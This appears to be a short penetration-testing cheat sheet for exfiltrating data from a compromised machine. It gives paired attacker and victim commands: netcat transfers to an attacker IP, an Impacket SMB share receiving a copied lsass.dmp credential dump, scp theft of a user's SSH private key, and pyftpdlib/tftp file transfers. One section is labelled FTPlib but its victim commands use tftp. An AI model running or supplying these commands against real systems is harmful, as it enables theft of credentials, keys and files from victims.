Links

Exfiltrate Data

Netcat

# Attacker
nc -lnvp 1234 > file.txt
​
# Victim
nc.exe -vn <attacker-ip> 1234 < file.txt
​
# Important: Always close the connection from the receiver to avoid losing the shell.

Impacket

# Attacker
sudo impacket-smbserver -comment "SHARE" TMP /home/<username>/smb -smb2support
​
# Victim
copy-item -path c:\windows\tasks\lsass.dmp \\<attacker-ip>\tmp\lsass.dmp
​

SCP

Download private key from user to my machine
scp <username>@<victim-ip>:/home/<username>/.ssh/id_rsa ~/.ssh/<username>.key

Python FTPlib

# pip install pyftpdlib
# Attacker
python -m pyftpdlib -p 21
​
# Victim
# Put file
tftp -i <attacker-ip> PUT file.txt
# Get file
tftp -i <attacker-ip> GET file.txt